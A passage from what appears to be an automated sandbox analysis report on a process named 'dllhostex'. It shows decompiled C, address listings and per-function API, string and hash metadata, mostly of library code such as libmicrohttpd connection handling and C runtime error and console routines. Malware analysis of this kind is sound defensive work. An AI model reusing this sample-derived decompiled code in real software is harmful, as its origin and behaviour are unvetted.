																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t183;
														}
														__eflags = _t187 - _t106;
														if(__eflags < 0) {
															goto L64;
														}
														if(__eflags > 0) {
															goto L63;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L64;
														}
														goto L63;
													}
													__eflags = _t187 - _t106;
													if(__eflags < 0) {
														goto L59;
													}
													if(__eflags > 0) {
														goto L58;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L59;
													}
													goto L58;
												}
												_t137 = 0x3e8;
												if(__eflags > 0) {
													L53:
													_push(_t137);
													_push(_t106);
													_push(_t137);
													_push(_t187);
													_t112 = E01374040();
													_t187 = _t137;
													_t137 = _t148;
													_v32 = _t173;
													_t173 = _v40;
													 *_t173 = _t112 + 0x30;
													_t182 = _t173 + 1;
													_t106 = 0;
													__eflags = 0;
													goto L54;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L54;
												}
												goto L53;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L49;
											}
											goto L48;
										}
									}
									goto L25;
								}
							}
							 *_t185 = _t90;
							_t143 =  *_t136 | _t136[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t185 = 0x2d;
							_t185 = _t185 + 1;
							__eflags = _t185;
							_t141 = _t136[1];
							goto L14;
						}
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t183 = E0136633C(_t136, _t141, _t136, _t185, _a12, _a16, _a20, _t181, 0, _a32, 0);
					__eflags = _t183;
					if(_t183 == 0) {
						_t132 = E01354E10(_t185, 0x65);
						__eflags = _t132;
						if(_t132 != 0) {
							_t167 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t167;
							 *_t132 = _t167;
							 *((char*)(_t132 + 3)) = 0;
						}
						_t183 = 0;
					} else {
						 *_t185 = 0;
					}
					goto L65;
				}
				_t133 = E0135EB5C();
				_t183 = 0x22;
				 *_t133 = _t183;
				E0135B7A1();
				goto L65;
			}

























































                                                0x01366022
                                                0x0136602d
                                                0x01366032
                                                0x01366034
                                                0x01366034
                                                0x01366038
                                                0x01366041
                                                0x01366043
                                                0x01366048
                                                0x0136604e
                                                0x01366064
                                                0x01366067
                                                0x0136606c
                                                0x01366076
                                                0x0136607b
                                                0x013660cf
                                                0x013660d1
                                                0x013660e0
                                                0x013660e3
                                                0x013660e6
                                                0x013660e8
                                                0x013660ef
                                                0x01366101
                                                0x01366104
                                                0x01366109
                                                0x0136610d
                                                0x0136610e
                                                0x0136612e
                                                0x01366131
                                                0x01366131
                                                0x01366131
                                                0x01366133
                                                0x01366133
                                                0x01366136
                                                0x01366139
                                                0x0136613b
                                                0x0136614c
                                                0x0136613d
                                                0x0136613d
                                                0x0136613d
                                                0x0136614e
                                                0x01366153
                                                0x01366153
                                                0x01366158
                                                0x0136615b
                                                0x01366165
                                                0x01366167
                                                0x01366169
                                                0x0136616e
                                                0x0136616f
                                                0x01366172
                                                0x01366175
                                                0x01366178
                                                0x01366178
                                                0x0136617a
                                                0x00000000
                                                0x00000000
                                                0x01366191
                                                0x0136619b
                                                0x0136619c
                                                0x0136619f
                                                0x013661a2
                                                0x013661a6
                                                0x013661ab
                                                0x013661ab
                                                0x013661ad
                                                0x013661ad
                                                0x013661b3
                                                0x013661b6
                                                0x013661ba
                                                0x013661bc
                                                0x013661c0
                                                0x013661c3
                                                0x013661c6
                                                0x013661c7
                                                0x013661ca
                                                0x013661cd
                                                0x013661d0
                                                0x013661d0
                                                0x013661d5
                                                0x013661d8
                                                0x013661db
                                                0x00000000
                                                0x00000000
                                                0x013661f2
                                                0x013661f7
                                                0x013661fb
                                                0x00000000
                                                0x00000000
                                                0x013661fd
                                                0x01366200
                                                0x01366200
                                                0x01366202
                                                0x01366205
                                                0x00000000
                                                0x00000000
                                                0x01366207
                                                0x0136620a
                                                0x01366212
                                                0x01366215
                                                0x01366228
                                                0x01366228
                                                0x01366228
                                                0x01366217
                                                0x01366217
                                                0x0136621a
                                                0x0136621f
                                                0x0136621f
                                                0x0136621f
                                                0x01366224
                                                0x01366224
                                                0x00000000
                                                0x01366215
                                                0x0136620c
                                                0x0136620c
                                                0x0136620f
                                                0x0136620f
                                                0x0136615d
                                                0x0136615d
                                                0x0136615f
                                                0x0136622b
                                                0x0136622b
                                                0x0136622d
                                                0x0136622f
                                                0x01366232
                                                0x01366233
                                                0x01366234
                                                0x01366235
                                                0x0136623d
                                                0x0136623d
                                                0x0136623f
                                                0x0136623f
                                                0x01366242
                                                0x01366245
                                                0x01366248
                                                0x0136624a
                                                0x0136624c
                                                0x0136624c
                                                0x01366259
                                                0x01366260
                                                0x01366267
                                                0x01366269
                                                0x01366272
                                                0x01366272
                                                0x01366275
                                                0x01366277
                                                0x0136627a
                                                0x0136627d
                                                0x01366289
                                                0x01366289
                                                0x0136628d
                                                0x01366290
                                                0x01366292
                                                0x00000000
                                                0x0136627f
                                                0x0136627f
                                                0x01366285
                                                0x01366285
                                                0x01366293
                                                0x01366293
                                                0x01366296
                                                0x0136629a
                                                0x0136629b
                                                0x0136629d
                                                0x0136629f
                                                0x013662a1
                                                0x013662ca
                                                0x013662ca
                                                0x013662cc
                                                0x013662d9
                                                0x013662d9
                                                0x013662da
                                                0x013662db
                                                0x013662dd
                                                0x013662df
                                                0x013662e4
                                                0x013662e6
                                                0x013662e9
                                                0x013662ec
                                                0x013662ef
                                                0x013662f1
                                                0x013662f2
                                                0x013662f2
                                                0x013662f4
                                                0x013662f4
                                                0x013662f6
                                                0x01366303
                                                0x01366303
                                                0x01366304
                                                0x01366305
                                                0x01366307
                                                0x01366308
                                                0x01366309
                                                0x01366311
                                                0x01366314
                                                0x01366316
                                                0x01366317
                                                0x01366317
                                                0x01366319
                                                0x01366319
                                                0x01366319
                                                0x0136631c
                                                0x0136631e
                                                0x01366321
                                                0x01366323
                                                0x01366329
                                                0x0136632e
                                                0x0136632e
                                                0x0136633b
                                                0x0136633b
                                                0x013662f8
                                                0x013662fa
                                                0x00000000
                                                0x00000000
                                                0x013662fc
                                                0x00000000
                                                0x00000000
                                                0x013662fe
                                                0x01366301
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01366301
                                                0x013662ce
                                                0x013662d0
                                                0x00000000
                                                0x00000000
                                                0x013662d2
                                                0x00000000
                                                0x00000000
                                                0x013662d4
                                                0x013662d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013662d7
                                                0x013662a3
                                                0x013662a8
                                                0x013662ae
                                                0x013662ae
                                                0x013662af
                                                0x013662b0
                                                0x013662b1
                                                0x013662b3
                                                0x013662b8
                                                0x013662ba
                                                0x013662bb
                                                0x013662c0
                                                0x013662c3
                                                0x013662c5
                                                0x013662c8
                                                0x013662c8
                                                0x00000000
                                                0x013662c8
                                                0x013662aa
                                                0x013662ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013662ac
                                                0x01366281
                                                0x01366283
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01366283
                                                0x0136627d
                                                0x00000000
                                                0x0136615f
                                                0x0136615b
                                                0x01366110
                                                0x0136611c
                                                0x0136611c
                                                0x0136611e
                                                0x01366125
                                                0x00000000
                                                0x01366125
                                                0x01366120
                                                0x00000000
                                                0x01366120
                                                0x013660d3
                                                0x013660d9
                                                0x013660d9
                                                0x013660dc
                                                0x013660dc
                                                0x013660dd
                                                0x00000000
                                                0x013660dd
                                                0x013660d5
                                                0x013660d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013660d7
                                                0x01366095
                                                0x0136609a
                                                0x0136609c
                                                0x013660a9
                                                0x013660b0
                                                0x013660b2
                                                0x013660bd
                                                0x013660bd
                                                0x013660c0
                                                0x013660c2
                                                0x013660c2
                                                0x013660c6
                                                0x0136609e
                                                0x0136609e
                                                0x0136609e
                                                0x00000000
                                                0x0136609c
                                                0x01366050
                                                0x01366057
                                                0x01366058
                                                0x0136605a
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: e3ea8d8bb984ed6d9e42cdb06ef0b2b72a25c3cc5b87a9fa46dcaf8266aadd7e
                                                • Instruction ID: b4c1ec5b831158735fbe3a5a050cf1ad60b592a64321f24001e9c2d3b7f6595c
                                                • Opcode Fuzzy Hash: e3ea8d8bb984ed6d9e42cdb06ef0b2b72a25c3cc5b87a9fa46dcaf8266aadd7e
                                                • Instruction Fuzzy Hash: D1B155B19042469FEB21CF2CC8527BEBFFDEF45298F1481AAD845DB246D6389901CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134DDC0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 29%
                                                			E0134DDC0(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t66;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t81;
				void* _t83;
				void* _t85;

				_t69 = __ecx;
				_t70 =  *((intOrPtr*)(__ecx + 0x1c));
				_t39 =  *((intOrPtr*)(_t70 + 0xc));
				_v4 = _t39;
				if(_t39 == 0) {
					L23:
					return 1;
				} else {
					_t59 =  *((intOrPtr*)(_t70 + 0x38));
					_t66 =  *((intOrPtr*)(_t70 + 0x3c));
					if(_t59 != 0 || _t66 != 0) {
						_t56 =  *((intOrPtr*)(_t69 + 0x78));
						_t71 =  *((intOrPtr*)(_t69 + 0x7c));
						if(_t56 != _t59 || _t71 != _t66) {
							_t41 =  *((intOrPtr*)(_t70 + 0x40));
							_t81 =  *((intOrPtr*)(_t70 + 0x44)) - _t71;
							if(_t81 > 0 || _t81 >= 0 && _t41 > _t56) {
								L11:
								_t42 =  *((intOrPtr*)(_t70 + 0x54));
								_t60 = _t59 - _t56;
								_v16 = 0;
								asm("sbb edx, ebp");
								_t85 = _v16 - _t66;
								if(_t85 > 0 || _t85 >= 0 && _t42 >= _t60) {
									_t42 = _t60;
									_v12 = _t66;
								} else {
									_v12 = _v16;
								}
								_t57 = _v4( *((intOrPtr*)(_t70 + 8)), _t56, _t71,  *((intOrPtr*)(_t70 + 4)), _t42);
								if(_t57 == 0xffffffff || _t57 == 0xfffffffe) {
									 *((intOrPtr*)(_t70 + 0x38)) =  *((intOrPtr*)(_t69 + 0x78));
									 *((intOrPtr*)(_t70 + 0x3c)) =  *((intOrPtr*)(_t69 + 0x7c));
									_t37 = _t70 + 0x1c; // 0x1c
									LeaveCriticalSection(_t37);
									if(_t57 != 0xffffffff) {
										_push("Closing connection (application reported error generating data)\n");
										_push( *((intOrPtr*)(_t69 + 0x10)));
										E01351E90();
										E0134DD20(_t69, 1);
										return 0;
									} else {
										E0134DD20(_t69, 0);
										return 0;
									}
								} else {
									 *((intOrPtr*)(_t70 + 0x40)) =  *((intOrPtr*)(_t69 + 0x78));
									 *((intOrPtr*)(_t70 + 0x44)) =  *((intOrPtr*)(_t69 + 0x7c));
									 *((intOrPtr*)(_t70 + 0x50)) = _t57;
									if(_t57 != 0) {
										goto L23;
									} else {
										_t31 = _t70 + 0x1c; // 0x1c
										 *((intOrPtr*)(_t69 + 0xac)) = 0xd;
										LeaveCriticalSection(_t31);
										return 0;
									}
								}
							} else {
								_v16 =  *((intOrPtr*)(_t70 + 0x50));
								_v16 = _v16 +  *((intOrPtr*)(_t70 + 0x40));
								_t71 =  *((intOrPtr*)(_t69 + 0x7c));
								asm("adc eax, [esi+0x44]");
								_t83 = 0 - _t71;
								if(_t83 > 0 || _t83 >= 0 && _v16 > _t56) {
									goto L23;
								} else {
									goto L11;
								}
							}
						} else {
							goto L23;
						}
					} else {
						goto L23;
					}
				}
			}




















                                                0x0134ddc7
                                                0x0134ddc9
                                                0x0134ddcc
                                                0x0134ddcf
                                                0x0134ddd5
                                                0x0134df06
                                                0x0134df0f
                                                0x0134dddb
                                                0x0134dddb
                                                0x0134ddde
                                                0x0134dde3
                                                0x0134dded
                                                0x0134ddf0
                                                0x0134ddf5
                                                0x0134ddff
                                                0x0134de02
                                                0x0134de05
                                                0x0134de37
                                                0x0134de37
                                                0x0134de3a
                                                0x0134de3c
                                                0x0134de44
                                                0x0134de46
                                                0x0134de4a
                                                0x0134de5c
                                                0x0134de5e
                                                0x0134de52
                                                0x0134de56
                                                0x0134de56
                                                0x0134de6f
                                                0x0134de77
                                                0x0134deb2
                                                0x0134deb8
                                                0x0134debb
                                                0x0134debf
                                                0x0134dec8
                                                0x0134dedd
                                                0x0134dee2
                                                0x0134dee5
                                                0x0134def4
                                                0x0134df02
                                                0x0134deca
                                                0x0134dece
                                                0x0134dedc
                                                0x0134dedc
                                                0x0134de7e
                                                0x0134de81
                                                0x0134de87
                                                0x0134de8a
                                                0x0134de8f
                                                0x00000000
                                                0x0134de91
                                                0x0134de91
                                                0x0134de94
                                                0x0134de9f
                                                0x0134deae
                                                0x0134deae
                                                0x0134de8f
                                                0x0134de0d
                                                0x0134de13
                                                0x0134de19
                                                0x0134de1d
                                                0x0134de20
                                                0x0134de23
                                                0x0134de25
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134de25
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134dde3

                                                APIs
                                                • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,?,?,013506D7), ref: 0134DE9F
                                                • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,?,?,013506D7), ref: 0134DEBF
                                                  • Part of subcall function 0134DD20: shutdown.WS2_32(?,00000001), ref: 0134DD56
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DDC4
                                                • Closing connection (application reported error generating data), xrefs: 0134DEDD
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalLeaveSection$shutdown
                                                • String ID: Closing connection (application reported error generating data)$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 1820652927-3461260996
                                                • Opcode ID: d92931d1fece897fe3742935dc6c0d5b3397abf3e6758f96ed7c1cdf4195a501
                                                • Instruction ID: 9afcfa2ed75590c390766b002f4c569fb5f74ffe91589a15a1a0ea261bfbe8f5
                                                • Opcode Fuzzy Hash: d92931d1fece897fe3742935dc6c0d5b3397abf3e6758f96ed7c1cdf4195a501
                                                • Instruction Fuzzy Hash: 1141B0316007068BD735DFADD88052AF7E1FBA4228B44493EE966C3B50D771F8598B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01365E73 Relevance: 6.1, APIs: 4, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E01365E73(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t13;
				void* _t14;
				void* _t16;
				long _t18;
				void* _t19;

				_t14 = __ecx;
				_t18 = GetLastError();
				_t2 =  *0x13cc370; // 0x6
				_t22 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L5:
					_t3 = E013672FE(_t14, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t19 = E01366CCA(_t14, 1, 0x364);
						_pop(_t16);
						__eflags = _t19;
						if(__eflags != 0) {
							__eflags = E013672FE(_t16, __eflags,  *0x13cc370, _t19);
							if(__eflags != 0) {
								E01365B4C(_t19, _t19, 0x13d5274);
								E013656E2(0);
								_t13 = _t19;
							} else {
								_t13 = 0;
								E013672FE(_t16, __eflags,  *0x13cc370, 0);
								_push(_t19);
								goto L8;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E013672FE(_t16, 0,  *0x13cc370, 0);
							_push(0);
							L8:
							E013656E2();
						}
					}
				} else {
					_t13 = E013672A8(_t14, _t22, _t2);
					if(_t13 == 0) {
						_t2 =  *0x13cc370; // 0x6
						goto L5;
					} else {
						if(_t13 == 0xffffffff) {
							L3:
							_t13 = 0;
						}
					}
				}
				SetLastError(_t18);
				return _t13;
			}











                                                0x01365e73
                                                0x01365e7e
                                                0x01365e80
                                                0x01365e85
                                                0x01365e88
                                                0x01365ea4
                                                0x01365ea7
                                                0x01365eac
                                                0x01365eae
                                                0x00000000
                                                0x01365eb0
                                                0x01365ebc
                                                0x01365ebf
                                                0x01365ec0
                                                0x01365ec2
                                                0x01365ee7
                                                0x01365ee9
                                                0x01365f02
                                                0x01365f09
                                                0x01365f11
                                                0x01365eeb
                                                0x01365eeb
                                                0x01365ef4
                                                0x01365ef9
                                                0x00000000
                                                0x01365ef9
                                                0x01365ec4
                                                0x01365ec4
                                                0x01365ec4
                                                0x01365ecd
                                                0x01365ed2
                                                0x01365ed3
                                                0x01365ed3
                                                0x01365ed8
                                                0x01365ec2
                                                0x01365e8a
                                                0x01365e90
                                                0x01365e94
                                                0x01365e9f
                                                0x00000000
                                                0x01365e96
                                                0x01365e99
                                                0x01365e9b
                                                0x01365e9b
                                                0x01365e9b
                                                0x01365e99
                                                0x01365e94
                                                0x01365f14
                                                0x01365f1f

                                                APIs
                                                • GetLastError.KERNEL32(?,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01365E78
                                                • _free.LIBCMT ref: 01365ED3
                                                • _free.LIBCMT ref: 01365F09
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01365F14
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: d80bff7d444c8fff52e6a9c8c174c9227ed18f8907974cb21668d9209e4fca5b
                                                • Instruction ID: af9666a3d42d15238c3edb56cf232d819369b084af1e271b9e698a6a0f6d6c50
                                                • Opcode Fuzzy Hash: d80bff7d444c8fff52e6a9c8c174c9227ed18f8907974cb21668d9209e4fca5b
                                                • Instruction Fuzzy Hash: E801C031A442026EEA3226BCBC8496B3A4C9B566FCB60D235F518961DCDA688C074760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134D9F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E0134D9F0(void* __eax, intOrPtr* __ecx) {
				intOrPtr* _t9;
				intOrPtr* _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t23;

				_t8 = __eax;
				_t17 = __ecx;
				if(__ecx == 0) {
					return __eax;
				} else {
					_t19 = __ecx + 0x1c;
					EnterCriticalSection(_t19);
					_t2 = _t17 + 0x58;
					 *_t2 =  *((intOrPtr*)(_t17 + 0x58)) + 0xffffffff;
					_push(_t19);
					if( *_t2 == 0) {
						LeaveCriticalSection();
						DeleteCriticalSection(_t19);
						_t9 =  *((intOrPtr*)(_t17 + 0x10));
						if(_t9 != 0) {
							 *_t9( *((intOrPtr*)(_t17 + 8)));
							_t23 = _t23 + 4;
						}
						if( *_t17 == 0) {
							L7:
							return E0135C9E5(_t17);
						} else {
							do {
								_t21 =  *_t17;
								 *_t17 =  *((intOrPtr*)( *_t17));
								E0135C9E5( *((intOrPtr*)( *_t17 + 4)));
								E0135C9E5( *((intOrPtr*)(_t21 + 8)));
								E0135C9E5(_t21);
								_t23 = _t23 + 0xc;
							} while ( *_t17 != 0);
							goto L7;
						}
					}
					LeaveCriticalSection();
					return _t8;
				}
			}







                                                0x0134d9f0
                                                0x0134d9f1
                                                0x0134d9f5
                                                0x0134da62
                                                0x0134d9f7
                                                0x0134d9f8
                                                0x0134d9fc
                                                0x0134da02
                                                0x0134da02
                                                0x0134da06
                                                0x0134da07
                                                0x0134da12
                                                0x0134da19
                                                0x0134da1f
                                                0x0134da24
                                                0x0134da29
                                                0x0134da2b
                                                0x0134da2b
                                                0x0134da31
                                                0x0134da57
                                                0x00000000
                                                0x0134da33
                                                0x0134da33
                                                0x0134da33
                                                0x0134da37
                                                0x0134da3c
                                                0x0134da44
                                                0x0134da4a
                                                0x0134da4f
                                                0x0134da52
                                                0x00000000
                                                0x0134da33
                                                0x0134da31
                                                0x0134da09
                                                0x0134da11
                                                0x0134da11

                                                APIs
                                                • EnterCriticalSection.KERNEL32(00000000,?,00000000,0134DD6E,00000000,?,?,770EEB70,0134BE74,?,?,770EEB70,0134D37C), ref: 0134D9FC
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0134DA09
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0134DA12
                                                • DeleteCriticalSection.KERNEL32(00000000), ref: 0134DA19
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$DeleteEnter
                                                • String ID:
                                                • API String ID: 122283594-0
                                                • Opcode ID: 383108460aa08b68f384c75dee05e7d524f4302620babdfdca2fe0c30e8c9df0
                                                • Instruction ID: 99e53cb288322c24638f839449cf19eb2df635b860ef9c615e8a35deb05e0a44
                                                • Opcode Fuzzy Hash: 383108460aa08b68f384c75dee05e7d524f4302620babdfdca2fe0c30e8c9df0
                                                • Instruction Fuzzy Hash: 9301A931104613DBE7616F5CEC09D99F7B8FF62728F140134E91193554DB35B5A2CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01371FFA Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E01371FFA(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x13cca40, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E01371FE3();
					E01371FA5();
					_t13 = WriteConsoleW( *0x13cca40, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                0x01372017
                                                0x0137201b
                                                0x01372028
                                                0x0137202d
                                                0x01372048
                                                0x01372048
                                                0x0137204e

                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,0000000D,?,00000000,00000000,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000), ref: 01372011
                                                • GetLastError.KERNEL32(?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000,00000000,?,01360811,?), ref: 0137201D
                                                  • Part of subcall function 01371FE3: CloseHandle.KERNEL32(FFFFFFFE,0137202D,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000,00000000), ref: 01371FF3
                                                • ___initconout.LIBCMT ref: 0137202D
                                                  • Part of subcall function 01371FA5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01371FD4,01369E37,00000000,?,01360290,00000000,?,00000000,00000000), ref: 01371FB8
                                                • WriteConsoleW.KERNEL32(00000000,0000000D,?,00000000,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000), ref: 01372042
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 43d7daed4a3d17a48ccc1ee53e0599dd158167ba807e054deef9258c68f8c10c
                                                • Instruction ID: 0827c3f0a4f50e4fbd7185e88a7635928f7d73283198d10cb3bca6c3a4c118ee
                                                • Opcode Fuzzy Hash: 43d7daed4a3d17a48ccc1ee53e0599dd158167ba807e054deef9258c68f8c10c
                                                • Instruction Fuzzy Hash: B8F03036400125BFDF335FDADC0CACA3F2AFB197A1F004020FA1986120C7369821EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134B050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Strings
                                                • Illegal call to MHD_get_timeout, xrefs: 0134B06D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Illegal call to MHD_get_timeout
                                                • API String ID: 0-1545223730
